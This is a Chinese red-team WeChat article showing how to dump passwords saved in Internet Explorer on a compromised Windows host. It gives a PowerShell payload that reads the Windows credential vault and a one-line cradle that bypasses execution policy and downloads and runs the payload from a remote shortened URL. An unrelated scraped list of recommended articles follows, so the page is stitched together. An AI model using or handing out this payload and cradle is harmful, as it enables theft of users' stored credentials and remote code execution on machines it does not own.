渗透攻击红队

一个专注于红队攻击的公众号

大家好,这里是 渗透攻击红队 的第 41 篇文章,本公众号会记录一些我学习红队攻击的复现笔记(由浅到深),不出意外每天一更

Powershell

内网渗透一直以来都是一个热门话题,试想在一个大型的内网环境下,当我们拿到了内网windows机器后,我们该如何通过他们去获取更多的所需资源,这就需要我们进行内网渗透了。然而在内网渗透中,除了kali、metasploit等高能的存在以外,还有一款神器也常常容易遭到忽略----PowerShell

Powershell 获取 IE 浏览器的账户密码信息

Powershell

首先需要的是一段 Powershell Payload:

[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]$vault = New-Object Windows.Security.Credentials.PasswordVault$vault.RetrieveAll() | % { $_.RetrievePassword();$_ } | select username,resource,password

我们可以把他放到公网上,这里有老外现成的了:http://bit.ly/2K75g15

如果你不想用它的域名,你也可以把 Powershell Payload 放到你自己的公网服务器上,然后使用 Powershell 调用它即可:

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://bit.ly/2K75g15')"

这个时候就能获取到你 IE 浏览器中的缓存信息,查找你保存的账户和密码信息。


参考文章:

https://github.com/HanseSecure/credgrap_ie_edge

渗透攻击红队

一个专注于渗透红队攻击的公众号

点分享点点赞点在看

浏览器获取设备信息_一条命令获取 IE 浏览器保存网站的账号和密码信息相关推荐

  1. bat脚本中获取上级目录_批处理bat命令--获取当前盘符和当前目录和上级目录

    批处理命令获取当前盘符和当前目录 %~d0 是当前盘符 %cd% 是当前目录 可以用echo %cd%进行打印测试 以下例子是命令行编译Visual Studio编写的程序: @echo off se ...

  2. bat脚本中获取上级目录_批处理bat命令 获取当前盘符和当前目录和上级目录的代码...

    批处理命令获取当前盘符和当前目录 当前盘符:%~d0 当前路径:%cd% 当前执行命令行:%0 当前bat文件路径:%~dp0 当前bat文件短路径:%~sdp0 测试 echo 当前盘符:%~d0 ...

  3. 系统无ifconfig,一条命令获取本机ip并将其赋值给指定变量来使用

    在Linux系统中,准确地获取本机IP信息是非常有用的.在写bash shell脚本事经常会用到IP,这时就需要我们使用一些办法获取本机IP并赋值给变量来使用.最近刚刚完成grep及sed的摸索.研究 ...

  4. android获取设备的唯一编号,android如何获取设备的唯一设备码

    在某些项目中,需要记录用户的某些设置,或行为,并上传到服务器,如果无需用户登录注册,就可记录独立这些内容,就需要用到设备的某些独立的序列.(以下部分android需要API8以以上,android2. ...

  5. 360 浏览器设置里安全设置里清除上网痕迹中没有“管理保存过的账号和密码”这个选项

    360浏览器设置里安全设置里清除上网痕迹中没有"管理保存过的账号和密码"这个选项 点击360浏览器右上角"管理"->"管理"里的&qu ...

  6. 计算机管理里面的用户名是否可以导出,360浏览器管理保存过的账号和密码步骤教程...

    许多360浏览器的用户在注册网站账号的时候,都会被360浏览器提醒安全保存该账号和密码,一般用户也会选择安全保存.但是,如果一个网站注册了多个账号,或者当时360浏览器管理保存过的账号和密码是错误的或 ...

  7. 用计算机获取信息,学会用CMD命令获取计算机的所有信息,菜鸟头衔马上崩塌

    提到windows操作系统,相信大家一点都不陌生,它以96.2%的市场份额,在全世界稳居操作系统榜首.其中,仅仅windows 10就已经占领了半壁江山.就连早在2001年发布的windows xp, ...

  8. adb查看手机cpu使用率_通过 adb 命令获取手机应用性能数据 (CPU、内存、流量)

    由于工作需要获取安卓手机游戏应用运行时的性能数据,上网学习了一些知识,整理记录下... 若有错误,欢迎指正:若有更好方法,感谢分享. 1. 获取CPU数据 命令:adb shell top -n -1 ...

  9. 为什么python不能输入中文_一条命令解决mac版本python IDLE不能输入中文问题

    安装完Python通常自动就有了一个简易的集成环境IDLE,但在mac上,无法在IDLE中使用中文. 通常故障有两种情况: 1.在IDLE中,中文输入法根本无法工作,不会弹出输入框,所有的输入都被当做 ...

最新文章

  1. jmeter聚个报告怎么看qps_Jmeter查看QPS和响应时间随着时间的变化曲线
  2. 创立创造创建的区别_【干货|知识分享】Solidworks与Rhino有什么区别呢?
  3. BZOJ2244 [SDOI2011]拦截导弹 【cdq分治 + 树状数组】
  4. 物联网平台构架系列 (四):Amazon, Microsoft, IBM IoT 解决方案导论 之 平台
  5. c++ 整数取反_c++ 取反运算符“~”
  6. 牛客网 【每日一题】7月27日题目精讲—乌龟棋
  7. 面试之 Python 进阶
  8. php多文件上传存储到表,PHP 实现一种多文件上传的方法
  9. alsa的动态库安装在哪里_linux 给运行程序指定动态库路径
  10. 【翻译】在Sencha Touch中创建离线/在线代理
  11. 干货!3 个重要因素,带你看透 AI 技术架构方案的可行性
  12. Atitit 概念:数据、信息、知识 目录 1. 艾提拉提出的 信息金字塔 数据 信息 知识 智慧 1 1.1. 洞见级别金字塔 数据 信息 知识 2 1.2. 数据 信息 知识韦恩图 3 1
  13. PID控制算法的c语言实现 附录2 直流电机PWM调速系统中控制电压非线性研究
  14. mime 类型列表_MIME类型的完整列表
  15. 机组0:为什么补码比原码多一个-128清晰解释
  16. 如何在国外进行自然科学研究
  17. 360极速浏览器插件不见了
  18. 国内各银行间异地汇款手续费对照表
  19. cv曲线面积的意义_南昌大学陈义旺、武汉大学闵杰《AFM》:大面积有机太阳能电池中一种减少非辐射复合损耗的有效方法...
  20. neo4j desktop下载及安装详解

热门文章

  1. 计算机专业英语教程计算机硬件翻译,计算机专业英语教程第5版翻译
  2. decimal 和 numeric (Transact-SQL)
  3. [JVM]35个java代码性能优化总结
  4. 计算机的硬件工作原理(图片部分资源摘自王道考研资料)
  5. 深入学习linux socket编程之select
  6. Ipython\Jupyter数据分析工具
  7. canny算法的实现(android加载图片,数组写入文件换行)
  8. sklearn、theano、TensorFlow 以及 theras 的理解
  9. 原 hibernate与mysql字段类型对应关系
  10. [密码学基础][每个信息安全博士生应该知道的52件事][Bristol Cryptography][第22篇]如何用蒙哥马利算法表示一个数字和多个相乘的数字